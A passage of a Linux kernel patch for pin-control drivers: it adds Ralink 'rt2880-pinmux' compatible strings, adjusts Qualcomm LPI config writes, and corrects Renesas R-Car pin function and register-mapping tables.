+ 	u32p_replace_bits(&val, pullup, LPI_GPIO_PULL_MASK);
+@@ -225,11 +234,6 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 
+ 	lpi_gpio_write(pctrl, group, LPI_GPIO_CFG_REG, val);
+ 
+-	if (output_enabled) {
+-		val = u32_encode_bits(value ? 1 : 0, LPI_GPIO_VALUE_OUT_MASK);
+-		lpi_gpio_write(pctrl, group, LPI_GPIO_VALUE_REG, val);
+-	}
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pinctrl/ralink/pinctrl-mt7620.c b/drivers/pinctrl/ralink/pinctrl-mt7620.c
+index 22ff16eff02ff..929a1ace56aeb 100644
+--- a/drivers/pinctrl/ralink/pinctrl-mt7620.c
++++ b/drivers/pinctrl/ralink/pinctrl-mt7620.c
+@@ -372,6 +372,7 @@ static int mt7620_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id mt7620_pinctrl_match[] = {
+ 	{ .compatible = "ralink,mt7620-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, mt7620_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-mt7621.c b/drivers/pinctrl/ralink/pinctrl-mt7621.c
+index b47968f40e0c2..0297cf455b3a0 100644
+--- a/drivers/pinctrl/ralink/pinctrl-mt7621.c
++++ b/drivers/pinctrl/ralink/pinctrl-mt7621.c
+@@ -97,6 +97,7 @@ static int mt7621_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id mt7621_pinctrl_match[] = {
+ 	{ .compatible = "ralink,mt7621-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, mt7621_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-rt2880.c b/drivers/pinctrl/ralink/pinctrl-rt2880.c
+index 811e12df11331..fd9af7c2ffd0e 100644
+--- a/drivers/pinctrl/ralink/pinctrl-rt2880.c
++++ b/drivers/pinctrl/ralink/pinctrl-rt2880.c
+@@ -41,6 +41,7 @@ static int rt2880_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id rt2880_pinctrl_match[] = {
+ 	{ .compatible = "ralink,rt2880-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, rt2880_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-rt305x.c b/drivers/pinctrl/ralink/pinctrl-rt305x.c
+index 5b204b7ca1f3c..13a012a65d1d8 100644
+--- a/drivers/pinctrl/ralink/pinctrl-rt305x.c
++++ b/drivers/pinctrl/ralink/pinctrl-rt305x.c
+@@ -118,6 +118,7 @@ static int rt305x_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id rt305x_pinctrl_match[] = {
+ 	{ .compatible = "ralink,rt305x-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, rt305x_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-rt3883.c b/drivers/pinctrl/ralink/pinctrl-rt3883.c
+index 44a66c3d2d2a1..b263764011e76 100644
+--- a/drivers/pinctrl/ralink/pinctrl-rt3883.c
++++ b/drivers/pinctrl/ralink/pinctrl-rt3883.c
+@@ -88,6 +88,7 @@ static int rt3883_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id rt3883_pinctrl_match[] = {
+ 	{ .compatible = "ralink,rt3883-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, rt3883_pinctrl_match);
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779a0.c b/drivers/pinctrl/renesas/pfc-r8a779a0.c
+index 760c83a8740bd..6069869353bb4 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779a0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779a0.c
+@@ -696,16 +696,8 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_SINGLE(PCIE0_CLKREQ_N),
+ 
+ 	PINMUX_SINGLE(AVB0_PHY_INT),
+-	PINMUX_SINGLE(AVB0_MAGIC),
+-	PINMUX_SINGLE(AVB0_MDC),
+-	PINMUX_SINGLE(AVB0_MDIO),
+-	PINMUX_SINGLE(AVB0_TXCREFCLK),
+ 
+ 	PINMUX_SINGLE(AVB1_PHY_INT),
+-	PINMUX_SINGLE(AVB1_MAGIC),
+-	PINMUX_SINGLE(AVB1_MDC),
+-	PINMUX_SINGLE(AVB1_MDIO),
+-	PINMUX_SINGLE(AVB1_TXCREFCLK),
+ 
+ 	PINMUX_SINGLE(AVB2_AVTP_PPS),
+ 	PINMUX_SINGLE(AVB2_AVTP_CAPTURE),
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779f0.c b/drivers/pinctrl/renesas/pfc-r8a779f0.c
+index 417c357f16b19..65c141ce909ac 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779f0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779f0.c
+@@ -1213,7 +1213,7 @@ static const unsigned int tsn1_avtp_pps_pins[] = {
+ 	RCAR_GP_PIN(3, 13),
+ };
+ static const unsigned int tsn1_avtp_pps_mux[] = {
+-	TSN0_AVTP_PPS_MARK,
++	TSN1_AVTP_PPS_MARK,
+ };
+ static const unsigned int tsn1_avtp_capture_a_pins[] = {
+ 	/* TSN1_AVTP_CAPTURE_A */
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779g0.c b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+index 5dd1c2c7708a8..43a63a21a6fb5 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779g0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+@@ -156,54 +156,54 @@
+ #define GPSR3_0		F_(MMC_SD_D1,		IP0SR3_3_0)
+ 
+ /* GPSR4 */
+-#define GPSR4_24	FM(AVS1)
+-#define GPSR4_23	FM(AVS0)
+-#define GPSR4_22	FM(PCIE1_CLKREQ_N)
+-#define GPSR4_21	FM(PCIE0_CLKREQ_N)
+-#define GPSR4_20	FM(TSN0_TXCREFCLK)
+-#define GPSR4_19	FM(TSN0_TD2)
+-#define GPSR4_18	FM(TSN0_TD3)
+-#define GPSR4_17	FM(TSN0_RD2)
+-#define GPSR4_16	FM(TSN0_RD3)
+-#define GPSR4_15	FM(TSN0_TD0)
+-#define GPSR4_14	FM(TSN0_TD1)
+-#define GPSR4_13	FM(TSN0_RD1)
+-#define GPSR4_12	FM(TSN0_TXC)
+-#define GPSR4_11	FM(TSN0_RXC)
+-#define GPSR4_10	FM(TSN0_RD0)
+-#define GPSR4_9		FM(TSN0_TX_CTL)
+-#define GPSR4_8		FM(TSN0_AVTP_PPS0)
+-#define GPSR4_7		FM(TSN0_RX_CTL)
+-#define GPSR4_6		FM(TSN0_AVTP_CAPTURE)
+-#define GPSR4_5		FM(TSN0_AVTP_MATCH)
+-#define GPSR4_4		FM(TSN0_LINK)
+-#define GPSR4_3		FM(TSN0_PHY_INT)
+-#define GPSR4_2		FM(TSN0_AVTP_PPS1)
+-#define GPSR4_1		FM(TSN0_MDC)
+-#define GPSR4_0		FM(TSN0_MDIO)
++#define GPSR4_24	F_(AVS1,		IP3SR4_3_0)
++#define GPSR4_23	F_(AVS0,		IP2SR4_31_28)
++#define GPSR4_22	F_(PCIE1_CLKREQ_N,	IP2SR4_27_24)
++#define GPSR4_21	F_(PCIE0_CLKREQ_N,	IP2SR4_23_20)
++#define GPSR4_20	F_(TSN0_TXCREFCLK,	IP2SR4_19_16)
++#define GPSR4_19	F_(TSN0_TD2,		IP2SR4_15_12)
++#define GPSR4_18	F_(TSN0_TD3,		IP2SR4_11_8)
++#define GPSR4_17	F_(TSN0_RD2,		IP2SR4_7_4)
++#define GPSR4_16	F_(TSN0_RD3,		IP2SR4_3_0)
++#define GPSR4_15	F_(TSN0_TD0,		IP1SR4_31_28)
++#define GPSR4_14	F_(TSN0_TD1,		IP1SR4_27_24)
++#define GPSR4_13	F_(TSN0_RD1,		IP1SR4_23_20)
++#define GPSR4_12	F_(TSN0_TXC,		IP1SR4_19_16)
++#define GPSR4_11	F_(TSN0_RXC,		IP1SR4_15_12)
++#define GPSR4_10	F_(TSN0_RD0,		IP1SR4_11_8)
++#define GPSR4_9		F_(TSN0_TX_CTL,		IP1SR4_7_4)
++#define GPSR4_8		F_(TSN0_AVTP_PPS0,	IP1SR4_3_0)
++#define GPSR4_7		F_(TSN0_RX_CTL,		IP0SR4_31_28)
++#define GPSR4_6		F_(TSN0_AVTP_CAPTURE,	IP0SR4_27_24)
++#define GPSR4_5		F_(TSN0_AVTP_MATCH,	IP0SR4_23_20)
++#define GPSR4_4		F_(TSN0_LINK,		IP0SR4_19_16)
++#define GPSR4_3		F_(TSN0_PHY_INT,	IP0SR4_15_12)
++#define GPSR4_2		F_(TSN0_AVTP_PPS1,	IP0SR4_11_8)
++#define GPSR4_1		F_(TSN0_MDC,		IP0SR4_7_4)
++#define GPSR4_0		F_(TSN0_MDIO,		IP0SR4_3_0)
+ 
+ /* GPSR 5 */
+-#define GPSR5_20	FM(AVB2_RX_CTL)
+-#define GPSR5_19	FM(AVB2_TX_CTL)
+-#define GPSR5_18	FM(AVB2_RXC)
+-#define GPSR5_17	FM(AVB2_RD0)
+-#define GPSR5_16	FM(AVB2_TXC)
+-#define GPSR5_15	FM(AVB2_TD0)
+-#define GPSR5_14	FM(AVB2_RD1)
+-#define GPSR5_13	FM(AVB2_RD2)
+-#define GPSR5_12	FM(AVB2_TD1)
+-#define GPSR5_11	FM(AVB2_TD2)
+-#define GPSR5_10	FM(AVB2_MDIO)
+-#define GPSR5_9		FM(AVB2_RD3)
+-#define GPSR5_8		FM(AVB2_TD3)
+-#define GPSR5_7		FM(AVB2_TXCREFCLK)
+-#define GPSR5_6		FM(AVB2_MDC)
+-#define GPSR5_5		FM(AVB2_MAGIC)
+-#define GPSR5_4		FM(AVB2_PHY_INT)
+-#define GPSR5_3		FM(AVB2_LINK)
+-#define GPSR5_2		FM(AVB2_AVTP_MATCH)
+-#define GPSR5_1		FM(AVB2_AVTP_CAPTURE)
+-#define GPSR5_0		FM(AVB2_AVTP_PPS)
++#define GPSR5_20	F_(AVB2_RX_CTL,		IP2SR5_19_16)
++#define GPSR5_19	F_(AVB2_TX_CTL,		IP2SR5_15_12)
++#define GPSR5_18	F_(AVB2_RXC,		IP2SR5_11_8)
++#define GPSR5_17	F_(AVB2_RD0,		IP2SR5_7_4)
++#define GPSR5_16	F_(AVB2_TXC,		IP2SR5_3_0)
++#define GPSR5_15	F_(AVB2_TD0,		IP1SR5_31_28)
++#define GPSR5_14	F_(AVB2_RD1,		IP1SR5_27_24)
++#define GPSR5_13	F_(AVB2_RD2,		IP1SR5_23_20)
++#define GPSR5_12	F_(AVB2_TD1,		IP1SR5_19_16)
++#define GPSR5_11	F_(AVB2_TD2,		IP1SR5_15_12)
++#define GPSR5_10	F_(AVB2_MDIO,		IP1SR5_11_8)
++#define GPSR5_9		F_(AVB2_RD3,		IP1SR5_7_4)
++#define GPSR5_8		F_(AVB2_TD3,		IP1SR5_3_0)
++#define GPSR5_7		F_(AVB2_TXCREFCLK,	IP0SR5_31_28)
++#define GPSR5_6		F_(AVB2_MDC,		IP0SR5_27_24)
++#define GPSR5_5		F_(AVB2_MAGIC,		IP0SR5_23_20)
++#define GPSR5_4		F_(AVB2_PHY_INT,	IP0SR5_19_16)
++#define GPSR5_3		F_(AVB2_LINK,		IP0SR5_15_12)
++#define GPSR5_2		F_(AVB2_AVTP_MATCH,	IP0SR5_11_8)
++#define GPSR5_1		F_(AVB2_AVTP_CAPTURE,	IP0SR5_7_4)
++#define GPSR5_0		F_(AVB2_AVTP_PPS,	IP0SR5_3_0)
+ 
+ /* GPSR 6 */
+ #define GPSR6_20	F_(AVB1_TXCREFCLK,		IP2SR6_19_16)
+@@ -268,209 +268,271 @@
+ #define GPSR8_0		F_(SCL0,			IP0SR8_3_0)
+ 
+ /* SR0 */
+-/* IP0SR0 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR0_3_0	F_(0, 0)		FM(ERROROUTC_B)		FM(TCLK2_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_7_4	F_(0, 0)		FM(MSIOF3_SS1)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_11_8	F_(0, 0)		FM(MSIOF3_SS2)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_15_12	FM(IRQ3)		FM(MSIOF3_SCK)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_19_16	FM(IRQ2)		FM(MSIOF3_TXD)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_23_20	FM(IRQ1)		FM(MSIOF3_RXD)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_27_24	FM(IRQ0)		FM(MSIOF3_SYNC)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_31_28	FM(MSIOF5_SS2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR0 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR0_3_0	FM(MSIOF5_SS1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_7_4	FM(MSIOF5_SYNC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_11_8	FM(MSIOF5_TXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_15_12	FM(MSIOF5_SCK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_19_16	FM(MSIOF5_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_23_20	FM(MSIOF2_SS2)		FM(TCLK1)		FM(IRQ2_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_27_24	FM(MSIOF2_SS1)		FM(HTX1)		FM(TX1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_31_28	FM(MSIOF2_SYNC)		FM(HRX1)		FM(RX1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR0 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR0_3_0	FM(MSIOF2_TXD)		FM(HCTS1_N)		FM(CTS1_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR0_7_4	FM(MSIOF2_SCK)		FM(HRTS1_N)		FM(RTS1_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR0_11_8	FM(MSIOF2_RXD)		FM(HSCK1)		FM(SCK1)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR0_3_0	F_(0, 0)		FM(ERROROUTC_N_B)	FM(TCLK2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_7_4	F_(0, 0)		FM(MSIOF3_SS1)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_11_8	F_(0, 0)		FM(MSIOF3_SS2)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_15_12	FM(IRQ3)		FM(MSIOF3_SCK)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_19_16	FM(IRQ2)		FM(MSIOF3_TXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_23_20	FM(IRQ1)		FM(MSIOF3_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_27_24	FM(IRQ0)		FM(MSIOF3_SYNC)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_31_28	FM(MSIOF5_SS2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR0_3_0	FM(MSIOF5_SS1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_7_4	FM(MSIOF5_SYNC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_11_8	FM(MSIOF5_TXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_15_12	FM(MSIOF5_SCK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_19_16	FM(MSIOF5_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_23_20	FM(MSIOF2_SS2)		FM(TCLK1)		FM(IRQ2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_27_24	FM(MSIOF2_SS1)		FM(HTX1)		FM(TX1)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_31_28	FM(MSIOF2_SYNC)		FM(HRX1)		FM(RX1)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR0_3_0	FM(MSIOF2_TXD)		FM(HCTS1_N)		FM(CTS1_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_7_4	FM(MSIOF2_SCK)		FM(HRTS1_N)		FM(RTS1_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_11_8	FM(MSIOF2_RXD)		FM(HSCK1)		FM(SCK1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR1 */
+-/* IP0SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR1_3_0	FM(MSIOF1_SS2)		FM(HTX3_A)		FM(TX3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_7_4	FM(MSIOF1_SS1)		FM(HCTS3_N_A)		FM(RX3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_11_8	FM(MSIOF1_SYNC)		FM(HRTS3_N_A)		FM(RTS3_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_15_12	FM(MSIOF1_SCK)		FM(HSCK3_A)		FM(CTS3_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_19_16	FM(MSIOF1_TXD)		FM(HRX3_A)		FM(SCK3)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_23_20	FM(MSIOF1_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_27_24	FM(MSIOF0_SS2)		FM(HTX1_X)		FM(TX1_X)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_31_28	FM(MSIOF0_SS1)		FM(HRX1_X)		FM(RX1_X)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR1_3_0	FM(MSIOF0_SYNC)		FM(HCTS1_N_X)		FM(CTS1_N_X)	FM(CANFD5_TX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_7_4	FM(MSIOF0_TXD)		FM(HRTS1_N_X)		FM(RTS1_N_X)	FM(CANFD5_RX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_11_8	FM(MSIOF0_SCK)		FM(HSCK1_X)		FM(SCK1_X)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_15_12	FM(MSIOF0_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_19_16	FM(HTX0)		FM(TX0)			F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_23_20	FM(HCTS0_N)		FM(CTS0_N)		FM(PWM8_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
